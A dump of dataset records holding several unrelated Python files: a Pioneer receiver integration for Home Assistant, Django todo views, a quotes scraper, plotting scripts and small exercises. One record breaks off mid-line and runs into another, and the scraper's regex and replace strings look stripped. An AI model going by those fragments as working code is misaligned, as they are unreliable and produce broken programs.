src=distance_raster_path)\n\n","sub_path":"distance_to_canals/build_dist_raster.py","file_name":"build_dist_raster.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"552178425","text":"from httplib import OK\n\nfrom flask import url_for\n\nfrom . import utils\n\n\ndef test_index(client):\n \"\"\"Test the response of the index route.\n\n :type client flask.testing.FlaskClient\n \"\"\"\n resp = client.get(url_for('index'))\n assert resp.status_code == OK\n soup = utils.get_soup(resp.data)\n assert utils.get_content_by_css(soup, 'head > title') == 'Home - microblog'\n assert utils.get_content_by_css(soup, 'body > h1') == 'Hi, Miguel!'\n assert len(soup.find_all('p')) == 2\n","sub_path":"tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"154988990","text":"\"\"\"Support for Pioneer Network Receivers.\"\"\"\r\nimport logging\r\nimport asyncio\r\nimport time\r\n\r\nimport voluptuous as vol\r\n\r\nfrom homeassistant.const import (\r\n ATTR_ENTITY_ID, CONF_HOST, CONF_NAME, CONF_PORT, STATE_OFF, STATE_ON,\r\n EVENT_HOMEASSISTANT_STOP\r\n)\r\n\r\n\r\nfrom homeassistant.components.media_player import MediaPlayerEntity, PLATFORM_SCHEMA\r\nfrom homeassistant.components.media_player.const import (\r\n SUPPORT_SELECT_SOURCE,\r\n SUPPORT_TURN_OFF,\r\n SUPPORT_TURN_ON,\r\n SUPPORT_VOLUME_MUTE,\r\n SUPPORT_VOLUME_SET,\r\n SUPPORT_VOLUME_STEP\r\n\r\n)\r\nfrom homeassistant.const import (\r\n CONF_HOST,\r\n CONF_NAME,\r\n CONF_PORT,\r\n CONF_TIMEOUT,\r\n STATE_OFF,\r\n STATE_ON,\r\n)\r\nimport homeassistant.helpers.config_validation as cv\r\n\r\n_LOGGER = logging.getLogger(__name__)\r\n\r\nCONF_SOURCES = \"sources\"\r\n\r\nDEFAULT_NAME = \"Pioneer AVR\"\r\nDEFAULT_PORT = 8102 # telnet default. Some Pioneer AVRs use 8102\r\nDEFAULT_TIMEOUT = None\r\nDEFAULT_SOURCES = {}\r\n\r\nDATA_PIONEER = 'pioneer'\r\n\r\nSUPPORT_PIONEER = (\r\n SUPPORT_VOLUME_SET\r\n | SUPPORT_VOLUME_MUTE\r\n | SUPPORT_TURN_ON\r\n | SUPPORT_TURN_OFF\r\n | SUPPORT_SELECT_SOURCE\r\n | SUPPORT_VOLUME_STEP\r\n)\r\n\r\n#MAX_VOLUME = 150\r\nMAX_VOLUME = 100\r\nMAX_SOURCE_NUMBERS = 60\r\n\r\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(\r\n {\r\n vol.Required(CONF_HOST): cv.string,\r\n vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,\r\n vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,\r\n vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): cv.socket_timeout,\r\n vol.Optional(CONF_SOURCES, default=DEFAULT_SOURCES): {cv.string: cv.string},\r\n }\r\n)\r\n\r\n\r\nasync def async_setup_platform(hass, config, async_add_entities, discovery_info=None):\r\n \"\"\"Set up the Pioneer platform.\"\"\"\r\n pioneer = PioneerDevice(\r\n hass,\r\n config[CONF_NAME],\r\n config[CONF_HOST],\r\n config[CONF_PORT],\r\n config[CONF_TIMEOUT],\r\n config[CONF_SOURCES],\r\n )\r\n\r\n hass.loop.create_task(pioneer.readdata())\r\n\r\n if DATA_PIONEER not in hass.data:\r\n hass.data[DATA_PIONEER] = []\r\n hass.data[DATA_PIONEER].append(pioneer)\r\n\r\n _LOGGER.debug(\"adding pio entity\")\r\n async_add_entities([pioneer], update_before_add=False)\r\n\r\n\r\n\r\nclass PioneerDevice(MediaPlayerEntity):\r\n \"\"\"Representation of a Pioneer device.\"\"\"\r\n\r\n def __init__(self, hass, name, host, port, timeout, sources):\r\n \"\"\"Initialize the Pioneer device.\"\"\"\r\n self._name = name\r\n self._host = host\r\n self._port = port\r\n self._timeout = timeout\r\n self._volume = 0\r\n self._muted = False\r\n self._selected_source = \"\"\r\n self._source_name_to_number = sources\r\n self._source_number_to_name = dict((v, k) for k, v in sources.items())\r\n \r\n self._volume = None\r\n self._muted = False\r\n self._power = False\r\n\r\n self._async_added = False\r\n self._stop_listen = False\r\n self.hasConnection = False\r\n self.reader = None\r\n self.writer = None\r\n\r\n hass.bus.async_listen(EVENT_HOMEASSISTANT_STOP, self.stop_pioneer)\r\n\r\n def stop_pioneer(self, event):\r\n _LOGGER.info(\"Shutting down Pioneer\")\r\n self._stop_listen = True\r\n\r\n\r\n async def async_added_to_hass(self):\r\n _LOGGER.debug(\"Async async_added_to_hass\")\r\n self._async_added = True\r\n\r\n async def readdata(self):\r\n _LOGGER.debug(\"Readdata\")\r\n\r\n while not self._stop_listen:\r\n if not self.hasConnection:\r\n try:\r\n self.reader, self.writer = \\\r\n await asyncio.open_connection(self._host, self._port)\r\n self.hasConnection = True\r\n _LOGGER.info(\"Connected to %s:%d\", self._host, self._port)\r\n except:\r\n _LOGGER.error(\"No connection to %s:%d, retry in 30s\", \\\r\n self._host, self.port)\r\n await asyncio.sleep(30)\r\n continue\r\n\r\n try:\r\n data = await self.reader.readuntil(b'\\n')\r\n except:\r\n self.hasConnection = False\r\n _LOGGER.error(\"Lost connection!\")\r\n continue\r\n\r\n if data.decode().strip() is None:\r\n await asyncio.sleep(1)\r\n _LOGGER.debug(\"none read\")\r\n continue\r\n self.parseData(data.decode())\r\n\r\n _LOGGER.debug(\"Finished Readdata\")\r\n return True\r\n\r\n def parseData(self, data):\r\n msg = \"\"\r\n _LOGGER.debug(\"Parse data\") \r\n _LOGGER.debug(data)\r\n # Selected input source\r\n if data[:2] == \"FN\":\r\n source_number = data[2:4]\r\n _LOGGER.debug(source_number)\r\n _LOGGER.debug(self._source_number_to_name)\r\n\r\n if source_number:\r\n self._selected_source = self._source_number_to_name.get(source_number)\r\n _LOGGER.debug(self._selected_source)\r\n else:\r\n self._selected_source = None\r\n\r\n # Power state\r\n elif data[:3] == \"PWR\":\r\n if (data[3] == \"1\") or (data[3] == \"2\"): # VSX-529 uses \"2\" for State off\r\n self._power = False\r\n else:\r\n self._power = True\r\n\r\n \r\n # Is muted\r\n elif data[:3] == \"MUT\":\r\n if data[3] == \"1\":\r\n self._muted = False\r\n else:\r\n self._muted = True\r\n\r\n\r\n # Volume level\r\n elif data[:3] == \"VOL\":\r\n self._volume = int(data[3:6]) / MAX_VOLUME\r\n _LOGGER.debug(\"Volume: \" + str(round(self._volume*100))+\"%\")\r\n\r\n\r\n else:\r\n print (data)\r\n\r\n if self._async_added:\r\n self.async_schedule_update_ha_state()\r\n\r\n return msg\r\n\r\n\r\n\r\n def telnet_command(self, command):\r\n _LOGGER.debug(\"Command: \" + command)\r\n\r\n if self.hasConnection:\r\n if not self.writer:\r\n _LOGGER.error(\"No writer available\")\r\n self.hasConnection = False\r\n return\r\n\r\n try:\r\n self.writer.write(command.encode(\"ASCII\") + b\"\\r\")\r\n except (ConnectionRefusedError, OSError):\r\n _LOGGER.error(\"Pioneer %s refused connection!\", self._name)\r\n self.hasConnection = False\r\n return\r\n except:\r\n _LOGGER.error(\"Pioneer %s lost connection!\", self._name)\r\n self.hasConnection = False\r\n return\r\n\r\n\r\n\r\n async def async_update(self):\r\n \"\"\"Get the latest details from the device.\"\"\"\r\n _LOGGER.debug(\"Update\")\r\n\r\n self.telnet_command(\"?P\") # Power state?\r\n\r\n if self._power:\r\n self.telnet_command(\"?V\") # Volume?\r\n self.telnet_command(\"?M\") # Muted?\r\n self.telnet_command(\"?F\") # Input source?\r\n return True\r\n\r\n @property\r\n def name(self):\r\n \"\"\"Return the name of the device.\"\"\"\r\n return self._name\r\n \r\n @property\r\n def state(self):\r\n \"\"\"Return the state of the device.\"\"\"\r\n if self._power:\r\n return STATE_ON\r\n return STATE_OFF\r\n\r\n @property\r\n def volume_level(self):\r\n \"\"\"Volume level of the media player (0..1).\"\"\"\r\n return self._volume\r\n\r\n @property\r\n def is_volume_muted(self):\r\n \"\"\"Boolean if volume is currently muted.\"\"\"\r\n return self._muted\r\n\r\n @property\r\n def supported_features(self):\r\n \"\"\"Flag media player features that are supported.\"\"\"\r\n return SUPPORT_PIONEER\r\n\r\n @property\r\n def source(self):\r\n \"\"\"Return the current input source.\"\"\"\r\n return self._selected_source\r\n\r\n @property\r\n def source_list(self):\r\n \"\"\"List of available input sources.\"\"\"\r\n return list(self._source_name_to_number.keys())\r\n\r\n def turn_off(self):\r\n \"\"\"Turn off media player.\"\"\"\r\n self.telnet_command(\"PF\")\r\n\r\n def volume_up(self):\r\n \"\"\"Volume up media player.\"\"\"\r\n self.telnet_command(\"VU\")\r\n\r\n def volume_down(self):\r\n \"\"\"Volume down media player.\"\"\"\r\n self.telnet_command(\"VD\")\r\n\r\n def set_volume_level(self, volume):\r\n \"\"\"Set volume level, range 0..1.\"\"\"\r\n # 60dB max\r\n# while (self._volume != volume)\r\n _LOGGER.warning(\"Self: %f %f %d\", self._volume, volume, (self._volume - volume)* MAX_VOLUME/2)\r\n \r\n for x in range(abs(round((self._volume - volume)* MAX_VOLUME/2))):\r\n if ((self._volume - volume)< 0):\r\n self.volume_up()\r\n if ((self._volume - volume)> 0):\r\n self.volume_down()\r\n time.sleep(.100)\r\n\r\n\r\n def mute_volume(self, mute):\r\n \"\"\"Mute (true) or unmute (false) media player.\"\"\"\r\n self.telnet_command(\"MO\" if mute else \"MF\")\r\n\r\n def turn_on(self):\r\n \"\"\"Turn the media player on.\"\"\"\r\n self.telnet_command(\"PO\")\r\n\r\n def select_source(self, source):\r\n \"\"\"Select input source.\"\"\"\r\n self.telnet_command(self._source_name_to_number.get(source) + \"FN\")\r\n","sub_path":"media_player.py","file_name":"media_player.py","file_ext":"py","file_size_in_byte":9177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"241428079","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom core.spyce_core import *\n\n\ndef xpp_twobody_nopert(spycore_obj, t, vstate):\n \n if(len(vstate) -1)\r\n\r\n\r\ndef log_error(e):\r\n \"\"\"\r\n It is always a good idea to log errors.\r\n This function just prints them, but you can\r\n make it do anything.\r\n \"\"\"\r\n print(e)\r\n\r\n\r\ndef write_to_txt(url):\r\n quotes = []\r\n raw_html = simple_get(url)\r\n regex1 = re.compile(\r\n '^
[\\s]*([\\w\\W][\\d\\D]*)[\\s]*[\\s]*([\\w\\W][\\d\\D]*)?<\\/span>[\\s\\S]([\\s\\S][\\w\\W][\\d\\D]*)<\\/a>[\\s\\S]<\\/span>')\r\n regex2 = re.compile(\r\n '^
([\\s\\S][\\w\\W][\\d\\D]*)([\\s\\S][\\w\\W][\\d\\D]*)?<\\/span>')\r\n\r\n for quote in raw_html.find_all('div', {\"class\": \"quoteText\"}):\r\n q = str(quote)\r\n r1 = regex1.match(q)\r\n r2 = regex2.match(q)\r\n fixed = \"\"\r\n if(r1):\r\n fixed = fix_string(r1)\r\n elif(r2):\r\n fixed = fix_string(r2)\r\n\r\n fixed = remove_format(fixed)\r\n fixed = fixed + \" #quote\"\r\n if(fixed != \"\"):\r\n quotes.append(fixed)\r\n\r\n return quotes\r\n\r\n\r\ndef fix_string(str):\r\n new_str = \"\"\r\n for group in str.groups():\r\n group.strip()\r\n new_str += \" \" + group.strip()\r\n\r\n return new_str.replace(\"
―\", \"― \")\r\n\r\ndef remove_format(str):\r\n\tfixed = str.replace(\"
\", \"\\n\")\r\n\tfixed = fixed.replace(\"\" , \"\")\r\n\tfixed = fixed.replace(\"\" , \"\")\r\n\tfixed = fixed.replace(\"\" , \"\")\r\n\tfixed = fixed.replace(\"\" , \"\")\r\n\tfixed = fixed.replace(\"\" , \"\")\r\n\tfixed = fixed.replace(\"\" , \"\")\r\n\tfixed = fixed.replace(\"&\" , \"&\")\r\n\treturn fixed\r\n","sub_path":"quotes.py","file_name":"quotes.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"173246555","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User\nfrom django.http.response import HttpResponseRedirect\n\nfrom django.shortcuts import redirect, render, get_object_or_404\n\nfrom todo.models import Task\n\nfrom django.urls import reverse\n\nfrom todo.forms import RegistrationForm, LoginForm, TaskForm, EditForm\n\nfrom django.contrib import messages\n\n# Create your views here.\n\ndef index(request):\n if request.user.is_authenticated:\n return redirect(reverse('todo:user_page', args=(request.user.id,)))\n \n tasks = None\n obj_list = None\n \n user = request.user\n task_form = TaskForm()\n if request.method == 'POST':\n try:\n\n title = request.POST['text']\n date = request.POST['date']\n email = request.POST['email']\n print(date)\n task_obj = Task(title=title, when_to_do=date, email=email)\n for task in Task.objects.all():\n if title == task.title and (email == task.email or task.email == '' or task.email == None):\n return redirect(reverse('todo:index'))\n task_obj.save()\n except:\n messages.error(request, f\"There was error in submitting your task, enter date field.\")\n return redirect(reverse('todo:index'))\n else:\n # check if this data already exist for this email\n \n tasks = Task.objects.all().filter(email=email)[::-1]\n obj_list = tasks[:5]\n\n return render(request, 'todo/index.html', {\n 'tasks':obj_list,\n 'task_form':task_form,\n })\n\ndef login_page(request):\n if request.user.is_authenticated:\n return redirect(reverse('todo:index'))\n \n login_form = LoginForm()\n if request.method == 'POST':\n try:\n login_form = RegistrationForm(request.POST)\n\n username = request.POST['username']\n password = request.POST['password']\n \n user = authenticate(request, username=username, password=password)\n \n print(user.id)\n if user is not None:\n login(request, user)\n\n \n except:\n messages.info(request, f\"Please fill the form\")\n return HttpResponseRedirect(reverse('todo:login_page'))\n else:\n \n #get user from User model \n user_obj = User.objects.get(username=user.id)\n\n all_task = Task.objects.all()\n for task in all_task:\n if task.user_id == None and task.email == user_obj.email:\n \n task_object = Task.objects.get(pk=task.id)\n task_object.user_id = user_obj.id\n task_object.save()\n return HttpResponseRedirect(reverse('todo:user_page', args=(user_obj.id,)))\n\n return render(request, 'todo/login.html', {\n 'login_form':login_form,\n })\n\n\ndef register_page(request):\n if request.user.is_authenticated:\n return redirect(reverse('todo:index'))\n register_form = RegistrationForm()\n\n if request.method == \"POST\":\n register_form = RegistrationForm(request.POST)\n\n if register_form.is_valid():\n register_form.save()\n# This should be ran by a signal\n username = register_form.cleaned_data['username']\n\n email = register_form.cleaned_data['email']\n # Get user records with the register email and username\n # fetch all task, loop through task to find if this user has a user_id == None with this email.\n # get task user_id and bind with this reg. user id\n # !!!! important: when updating a model object always use the .save() with the record_object itself.\n this_user = User.objects.get(username=username, email=email)\n\n all_task = Task.objects.all()\n \n for task in all_task:\n if task.user_id == None and task.email == this_user.email:\n # print(task.id, task.user_id, this_user.id)\n \n task_object = Task.objects.get(pk=task.id)\n # print(task_object)\n task_object.user_id = this_user.id\n task_object.save()\n messages.success(request, f\"Successfully created {username}, Enter credentals to Login.\")\n messages.success(request, f\"Successfully created {username}, Enter credentals to Login.\") \n return redirect(reverse('todo:login_page'))\n \n return render(request, 'todo/register.html', {\n\n 'register_form':register_form,\n\n })\n\n\ndef user_page(request, pk):\n if not request.user.is_authenticated:\n return redirect(reverse('todo:login_page'))\n user_obj = get_object_or_404(User, pk=pk)\n\n if request.method == \"POST\":\n\n try:\n title = request.POST['text']\n date = request.POST['date']\n email = user_obj.email\n\n obj = Task(user=request.user, title=title, when_to_do=date, email=email)\n obj.save()\n except:\n messages.info(request, f\"Please fill the fields\")\n return redirect(reverse('todo:user_page', args=(pk,)))\n else:\n return redirect(reverse('todo:user_page', args=(pk,)))\n\n\n task = user_obj.task_set.all().order_by('-created')\n return render(request, 'todo/user_page.html', {\n 'user_obj':user_obj,\n 'tasks':task,\n })\n\ndef edit(request, pk):\n if not request.user.is_authenticated:\n return redirect(reverse('todo:login_page'))\n task = get_object_or_404(Task, pk=pk)\n edit_form = EditForm(instance=task)\n\n if request.method == 'POST':\n edit_form = EditForm(request.POST, instance=task)\n\n if edit_form.is_valid():\n edit_form.save()\n\n return HttpResponseRedirect(reverse('todo:user_page', args=(request.user.id, )))\n return render(request, 'todo/edit.html', {\n 'form': edit_form,\n 'task':task,\n })\n\ndef delete(request, pk):\n if not request.user.is_authenticated:\n return redirect(reverse('todo:login_page'))\n\n task = get_object_or_404(Task, pk=pk)\n if request.method == 'POST':\n task.delete()\n return redirect(reverse('todo:user_page', args=(request.user.id,)))\n return render(request, 'todo/delete.html', {\n 'task':task,\n })\n\ndef logout_handler(request):\n logout(request)\n return redirect(reverse('todo:index'))","sub_path":"todo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"70623395","text":"class Solution(object):\n def intersect(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: List[int]\n \"\"\"\n if len(nums2) < len(nums1):\n nums1, nums2 = nums2, nums1\n res = []\n for n in nums1:\n if n in nums2:\n res.append(n)\n nums2.remove(n)\n return res","sub_path":"LeetCode/Algorithm/Python/350-Intersection of Two Arrays II.py","file_name":"350-Intersection of Two Arrays II.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"448161371","text":"\"\"\"Compute the contact forces required for static equilibrium of an assembly.\n\n1. Make an Xfunc of ``compute_interface_forces``\n2. Load an assembly from a JSON file.\n3. Make a sub-assembly corresponding to the building sequence.\n4. Check if the sub-assembly is properly supported.\n5. Compute interface forces.\n6. Visualise in Rhino.\n\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n\nimport compas\n\nfrom compas_rhino.utilities import XFunc\nfrom compas_assembly.datastructures import Assembly\n\n\n# make an XFunc version of the compute interfaces function\n\ncompute_interface_forces_xfunc = XFunc('compas_rbe.equilibrium.compute_interface_forces_xfunc')\n\n# path to CPython on RhinoMac\n# change this if necessary\n\nif compas.is_mono():\n python = os.path.join(os.environ['HOME'], 'anaconda3/bin/python')\n compute_interface_forces_xfunc.python = python\n\n# a convenience wrapper\n\ndef compute_interface_forces(assembly, **kwargs):\n data = {\n 'assembly': assembly.to_data(),\n 'blocks': {str(key): assembly.blocks[key].to_data() for key in assembly.blocks},\n }\n result = compute_interface_forces_xfunc(data, **kwargs)\n assembly.data = result['assembly']\n for key in assembly.blocks:\n assembly.blocks[key].data = result['blocks'][str(key)]\n\n# just so Rhino(Mac) gets the filepaths right\n\nHERE = os.path.dirname(__file__)\n\n# load an assembly from a JSON file\n\nassembly = Assembly.from_json(os.path.join(HERE, '../data/wall_courses.json'))\n\n# define a sequence of buildable blocks\n\nsequence = [28, 22, 23, 16, 17, 18, 11, 12, 13, 5, 6, 7, 8, 0, 1, 2, 3, 38]\n\n# create a sub_assembly for the sequence\n\nsub = assembly.subset(sequence)\n\n# check if the sub_assembly is supported\n\nsupports = list(sub.vertices_where({'is_support': True}))\n\nif not supports:\n raise Exception('The sub-assembly has no supports.')\n\n# compute the interface forces\n\ncompute_interface_forces(sub, solver='CPLEX', verbose=True)\n\n# update the original assembly\n\nfor u, v, attr in assembly.edges(True):\n if sub.has_edge(u, v):\n attr['interface_forces'] = sub.get_edge_attribute((u, v), 'interface_forces')\n else:\n attr['interface_forces'] = None\n\n# visualise the result\n\nassembly.draw({\n 'layer': 'Assembly',\n 'show.vertices': True,\n 'show.interfaces': True,\n 'show.forces': True,\n 'show.forces_as_vectors': False,\n 'mode.interface': 0,\n 'scale.force': 1.0\n})\n","sub_path":"examples/wall_sequence_equilibrium_rhino.py","file_name":"wall_sequence_equilibrium_rhino.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"618133731","text":"\"\"\"\n\nYou have three arrays\nMerge the first two based no positions from corresponding items fro 3rd array\nNegative items in 3rd array mean we don't wabt the corresponding item from 2nd array ni merged array.\n\nStory - You gemerate set of Ads, and Set of Web results. Web results are already ordered.\nYou want optimally insert ads on the apge. You run a model and for each item in Ads array model predict where it should go in resulting array\n\n\nExample:\n\na1: 10 11 12 13\na2: 01 02 03 04\na3: 01 -1 -1 03\n\nres: 10 01 11 12 04 13\n\n\"\"\"\n\ndef solve(a1, a2,a3):\n #few assumptions. Since this is Ads and Ads generate revenue - we must try hard to build resulting page\n dict={}\n\n if (a2 == None or a3 == None):\n return a1\n #this will set default values for dict\n for i in range(min(len(a2),len(a3))):\n if a3[i]>=0:\n dict[a3[i]]=a2[i]\n\n d = sorted(dict.items())\n\n i = 0\n j = 0\n k=0\n result = []\n\n while i < len(a1) and j< len(d):\n if d[j][0] == k:\n result.append(d[j][1])\n j+=1\n else:\n result.append(a1[i])\n i+=1\n k+=1\n\n while j < len(d):\n result.append(d[j][1])\n j+=1\n\n while i < len(a1):\n result.append(a1[i])\n i+=1\n\n print(result)\n return result\n\ndef solve_acceptable(a1, a2,a3):\n if (a2 == None or a3 == None):\n return a1\n\n dict={}\n for i in range(min(len(a2),len(a3))):\n if a3[i]>=0:\n dict[a3[i]]=a2[i]\n result = a1.copy() if a1 != None else []\n for d in sorted(dict.items()):\n result.insert(d[0],d[1])\n return result\n\nsolve_acceptable([10, 11, 12, 13],[1, 2, 3, 4],[1, -1, -1, 100])","sub_path":"archive/p_21.py","file_name":"p_21.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"200886548","text":"'''\nCreated on April 27, 2015\n@author: Prajit Kumar Das\nUsage: python plotResults.py username apiKey\n'''\n\nimport sys\nimport time\nimport databaseHandler\nimport plotly.tools as tls\n# Learn about API authentication here: https://plot.ly/python/getting-started\n# Find your apiKey here: https://plot.ly/settings/api\nimport plotly.plotly as py\nfrom plotly.graph_objs import *\nimport json\nimport gzip\nimport logging\nlogging.basicConfig(filename='syscall.log',level=logging.DEBUG)\n\n# This is a plot for Permissions count vs Frequency of apps requesting that many permissions\ndef generateAppPermissionsRequestedFrequencyHistogram(username, apiKey):\n\tpermCountDict = extractAppPermData()\n\tpermCount = []\n\tpermCountFreq = []\n\tfor permissionCount, permissionCountFreq in permCountDict.iteritems():\n\t\tpermCount.append(permissionCount)\n\t\tpermCountFreq.append(permissionCountFreq)\n\n\ttls.set_credentials_file(username, apiKey)\n\ttrace = Bar(\n\t\tx=permCount,\n\t\ty=permCountFreq,\n\t\tname='App frequency',\n\t\tmarker=Marker(\n\t\t\tcolor='rgb(55, 83, 109)'\n\t\t)\n\t)\n\tdata = Data([trace])\n\tlayout = Layout(\n\t\ttitle='App Frequency vs Number of Permissions requested',\n\t\txaxis=XAxis(\n\t\t\ttitle='Number of Permissions requested',\n\t\t\ttitlefont=Font(\n\t\t\t\tsize=16,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t),\n\t\t\ttickfont=Font(\n\t\t\t\tsize=14,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t)\n\t\t),\n\t\tyaxis=YAxis(\n\t\t\ttitle='App frequency',\n\t\t\ttitlefont=Font(\n\t\t\t\tsize=16,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t),\n\t\t\ttickfont=Font(\n\t\t\t\tsize=14,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t)\n\t\t),\n\t\tlegend=Legend(\n\t\t\tx=0,\n\t\t\ty=1.0,\n\t\t\tbgcolor='rgba(255, 255, 255, 0)',\n\t\t\tbordercolor='rgba(255, 255, 255, 0)'\n\t\t),\n\t\tbarmode='group',\n\t\tbargap=0.15,\n\t\tbargroupgap=0.1\n\t)\n\tfig = Figure(data=data, layout=layout)\n\tplot_url = py.plot(fig, filename='app-perm')\n\tlogging.debug('Check out the URL: '+plot_url+' for your plot')\n \ndef extractAppPermData():\n\tdbHandle = databaseHandler.dbConnectionCheck() #DB Open\n\n\tcursor = dbHandle.cursor()\n\tsqlStatement = \"SELECT * FROM `app_perm_count_view`;\"\n\ttry:\n\t\tcursor.execute(sqlStatement)\n\t\tif cursor.rowcount > 0:\n\t\t\tqueryOutput = cursor.fetchall()\n\t\t\tpermCountDict = {}\n\t\t\tfor row in queryOutput:\n\t\t\t\tpermissionCount = row[1]\n\t\t\t\tif permCountDict.has_key(permissionCount):\n\t\t\t\t\tcurrentValue = permCountDict[permissionCount]\n\t\t\t\t\tpermCountDict[permissionCount] = currentValue + 1\n\t\t\t\telse:\n\t\t\t\t\tpermCountDict[permissionCount] = 1\n\texcept:\n\t\tlogging.debug('Unexpected error:'+sys.exc_info()[0])\n\t\traise\n\n\tdbHandle.close() #DB Close\n\t\n\treturn permCountDict\n\t\n# This is a plot for Permissions count vs Frequency of apps requesting that many permissions\ndef generatePermissionsRequestedByAppFrequencyHistogram(username, apiKey):\n\tdbHandle = databaseHandler.dbConnectionCheck() #DB Open\n\n#\t crawlUrl(dbHandle, \"https://raw.githubusercontent.com/android/platform_frameworks_base/master/core/res/AndroidManifest.xml\")\t\n#\t sys.exit(1)\n\n\tcursor = dbHandle.cursor()\n\tsqlStatement = \"SELECT * FROM `perm_app_count_view` LIMIT 25;\"\n\ttry:\n\t\tcursor.execute(sqlStatement)\n\t\tif cursor.rowcount > 0:\n\t\t\tqueryOutput = cursor.fetchall()\n\t\t\tappCount = []\n\t\t\tpermName = []\n\t\t\tfor row in queryOutput:\n\t\t\t\tappCount.append(row[0])\n\t\t\t\tpermName.append(row[1])\n\texcept:\n\t\tlogging.debug('Unexpected error:'+sys.exc_info()[0])\n\t\traise\n\n\tdbHandle.close() #DB Close\n\n\ttls.set_credentials_file(username, apiKey)\n\ttracePerm = Bar(\n\t\tx=permName,\n\t\ty=appCount,\n\t\tname='App frequency count',\n\t\tmarker=Marker(\n\t\t\tcolor='rgb(55, 83, 100)'\n\t\t)\n\t)\n\tdata = Data([tracePerm])\n\tlayout = Layout(\n\t\ttitle='Permission vs App frequency count',\n\t\txaxis=XAxis(\n\t\t\ttitle='Permission',\n\t\t\ttitlefont=Font(\n\t\t\t\tsize=16,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t),\n\t\t\ttickfont=Font(\n\t\t\t\tsize=14,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t)\n\t\t),\n\t\tyaxis=YAxis(\n\t\t\ttitle='App frequency',\n\t\t\ttitlefont=Font(\n\t\t\t\tsize=16,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t),\n\t\t\ttickfont=Font(\n\t\t\t\tsize=14,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t)\n\t\t),\n\t\tlegend=Legend(\n\t\t\tx=0,\n\t\t\ty=1.0,\n\t\t\tbgcolor='rgba(255, 255, 255, 0)',\n\t\t\tbordercolor='rgba(255, 255, 255, 0)'\n\t\t),\n\t\tbarmode='group',\n\t\tbargap=0.15,\n\t\tbargroupgap=0.1\n\t)\n\tfig = Figure(data=data, layout=layout)\n\tplot_url = py.plot(fig, filename='perm-app')\n\tlogging.debug('Check out the URL: '+plot_url+' for your plot')\n\n# This is a plot for Goodness of Cluster measure using homogeneity_score, completeness_score\ndef generateGroundTruthResults(username, apiKey, clusterCountList, homogeneityScoreList, completenessScoreList, adjustedRandScoreList, adjustedMutualInfoScoreList, vMeasureScoreList, normalizedMutualInfoScore, postfix):\n\ttls.set_credentials_file(username, apiKey)\n\ttrace0 = Bar(\n\t\tx=clusterCountList,\n\t\ty=homogeneityScoreList,\n\t\tname='Homogeneity Score',\n\t\tmarker=Marker(\n\t\t\tcolor='rgb(0, 255, 0)'\n\t\t)\n\t)\n\ttrace1 = Bar(\n\t\tx=clusterCountList,\n\t\ty=completenessScoreList,\n\t\tname='Completeness Score',\n\t\tmarker=Marker(\n\t\t\tcolor='rgb(255, 0, 0)'\n\t\t)\n\t)\n\tdata = Data([trace0,trace1])\n\n\tif len(vMeasureScoreList) > 0:\n\t\ttrace2 = Bar(\n\t\t\tx=clusterCountList,\n\t\t\ty=vMeasureScoreList,\n\t\t\tname='V Measure Score',\n\t\t\tmarker=Marker(\n\t\t\t\tcolor='rgb(0, 0, 255)'\n\t\t\t)\n\t\t)\n\t\tdata = Data([trace0,trace1,trace2])\n\t\tif len(normalizedMutualInfoScore) > 0:\n\t\t\ttrace3 = Bar(\n\t\t\t\tx=clusterCountList,\n\t\t\t\ty=normalizedMutualInfoScore,\n\t\t\t\tname='Adjusted Mutual Info Score',\n\t\t\t\tmarker=Marker(\n\t\t\t\t\tcolor='rgb(100, 100, 100)'\n\t\t\t\t)\n\t\t\t)\n\t\t\tdata = Data([trace0,trace1,trace2,trace3])\n\t\t\t# if len(adjustedRandScoreList) > 0:\n\t\t\t# \ttrace4 = Bar(\n\t\t\t# \t\tx=clusterCountList,\n\t\t\t# \t\ty=adjustedRandScoreList,\n\t\t\t# \t\tname='Adjusted Rand Score',\n\t\t\t# \t\tmarker=Marker(\n\t\t\t# \t\t\tcolor='rgb(200, 200, 200)'\n\t\t\t# \t\t)\n\t\t\t# \t)\n\t\t\t# \tdata = Data([trace0,trace1,trace2,trace3,trace4])\n\t\n\tlayout = Layout(\n\t\ttitle='Number of Clusters vs Homogeneity and Completeness',\n\t\txaxis=XAxis(\n\t\t\ttitle='Number of Clusters',\n\t\t\ttitlefont=Font(\n\t\t\t\tsize=16,\n\t\t\t\tcolor='rgb(107, 107, 